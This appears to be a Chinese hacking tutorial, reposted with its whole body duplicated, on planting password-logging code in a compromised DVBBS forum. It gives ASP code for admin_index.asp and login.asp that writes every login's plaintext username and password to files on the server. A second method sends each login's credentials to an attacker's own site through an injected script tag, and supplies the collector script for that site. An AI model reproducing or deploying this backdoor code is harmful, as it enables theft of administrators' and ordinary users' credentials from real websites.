本文介绍了获取DVBBS后台明文密码的方法。老办法是修改admin_index.asp,但需FileSystemObject支持。新办法有两种,一是在login.asp中添加代码,二是建立特定目录和文件并在login.asp插入代码,调用Adodb.Stream,成功率更高。
我们知道以前,获得webshell后想进入DVBBS的后台,想要管理员的密码可以这样:
老办法:
修改admin_index.asp得到明文DVBBS后台密码
在"username=trim(replace(request("username")这行后面
Dim fsoObject
Dim tsObject
Set fsoObject = Server.CreateObject("Scripting.FileSystemObject")
set tsObject = fsoObject.CreateTextFile(Server.MapPath("rain.txt"))
tsObject.Write CStr(request("password"))
Set fsoObject = Nothing
Set tsObject = Nothing
只要管理员登陆后台,在目录下就生成了rain.txt,里面就记录了明文密码
这个办法有个缺点是需要FileSystemObject的支持,也就是需要FSO,对于没有FileSystemObject的主机就没有用了。
新办法:
方法一:login.asp中Case "chk"下:
on error resume next
dim rain
set lP=server.CreateObject("Adodb.Stream")
rain.Open
rain.Type=2
rain.CharSet="gb2312"
rain.LoadFromFile server.mapPath("918.asp")
rain.Position=lp.Size
rain.writetext now&request("username")&"text:"&request("password")&chr(10)
rain.SaveToFile server.mapPath("918.asp"),2
rain.Close
set rain=nothing
这样918.asp将获得全部登陆人的密码,时间和名字。
至于admin_index.asp你也可以加在这里只获得管理员的密码。
方法二:如果你有自己的网站:
建立目录918x,在里面建立一个空的918.asp和如下代码的rain.asp:
<%@codepage=936%>
<%Response.Expires=0 if request("k")="k" then%>
<pre><!--#include file="918.asp"-->
<%elseif request("n")<>"" and request("p")<>"" then
on error resume next
dim rain
set rain=server.CreateObject("Adodb.Stream")
rain.Open
rain.Type=2
rain.CharSet="gb2312"
rain.LoadFromFile server.mapPath("918.asp")
zh=rain.readtext(6152192)&"<"&"%if isempty(request(""k"")) then response.redirect ""rain.asp""%"&">"
rain.Position=0
rain.writetext now&"有大侠以名 "&request("n")&" 及密码 "&request("p")&" 试图登陆;其IP:"&Request.ServerVariables("REMOTE_ADDR")&"["&Request.ServerVariables("HTTP_X_FORWARDED_FOR")&"]"&chr(13)&chr(10)&zh
rain.SaveToFile server.mapPath("918.asp"),2
rain.Close
set rain=nothing
end if%>
在login.asp那里插入一句:
response.write "<SCRIPT src=http://你网站/918x/rain.asp?n="&request("username")&"&"&p="&request("password")&"></SCRIPT>"
--------所有登陆人都会乖乖的把名字和密码送到你的918.asp 里
这下调用Adodb.Stream,几乎机子里有是有的,所以成功率要更高。
老办法:
修改admin_index.asp得到明文DVBBS后台密码
在"username=trim(replace(request("username")这行后面
Dim fsoObject
Dim tsObject
Set fsoObject = Server.CreateObject("Scripting.FileSystemObject")
set tsObject = fsoObject.CreateTextFile(Server.MapPath("rain.txt"))
tsObject.Write CStr(request("password"))
Set fsoObject = Nothing
Set tsObject = Nothing
只要管理员登陆后台,在目录下就生成了rain.txt,里面就记录了明文密码
这个办法有个缺点是需要FileSystemObject的支持,也就是需要FSO,对于没有FileSystemObject的主机就没有用了。
新办法:
方法一:login.asp中Case "chk"下:
on error resume next
dim rain
set lP=server.CreateObject("Adodb.Stream")
rain.Open
rain.Type=2
rain.CharSet="gb2312"
rain.LoadFromFile server.mapPath("918.asp")
rain.Position=lp.Size
rain.writetext now&request("username")&"text:"&request("password")&chr(10)
rain.SaveToFile server.mapPath("918.asp"),2
rain.Close
set rain=nothing
这样918.asp将获得全部登陆人的密码,时间和名字。
至于admin_index.asp你也可以加在这里只获得管理员的密码。
方法二:如果你有自己的网站:
建立目录918x,在里面建立一个空的918.asp和如下代码的rain.asp:
<%@codepage=936%>
<%Response.Expires=0 if request("k")="k" then%>
<pre><!--#include file="918.asp"-->
<%elseif request("n")<>"" and request("p")<>"" then
on error resume next
dim rain
set rain=server.CreateObject("Adodb.Stream")
rain.Open
rain.Type=2
rain.CharSet="gb2312"
rain.LoadFromFile server.mapPath("918.asp")
zh=rain.readtext(6152192)&"<"&"%if isempty(request(""k"")) then response.redirect ""rain.asp""%"&">"
rain.Position=0
rain.writetext now&"有大侠以名 "&request("n")&" 及密码 "&request("p")&" 试图登陆;其IP:"&Request.ServerVariables("REMOTE_ADDR")&"["&Request.ServerVariables("HTTP_X_FORWARDED_FOR")&"]"&chr(13)&chr(10)&zh
rain.SaveToFile server.mapPath("918.asp"),2
rain.Close
set rain=nothing
end if%>
在login.asp那里插入一句:
response.write "<SCRIPT src=http://你网站/918x/rain.asp?n="&request("username")&"&"&p="&request("password")&"></SCRIPT>"
--------所有登陆人都会乖乖的把名字和密码送到你的918.asp 里
这下调用Adodb.Stream,几乎机子里有是有的,所以成功率要更高。
扫一扫
924
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
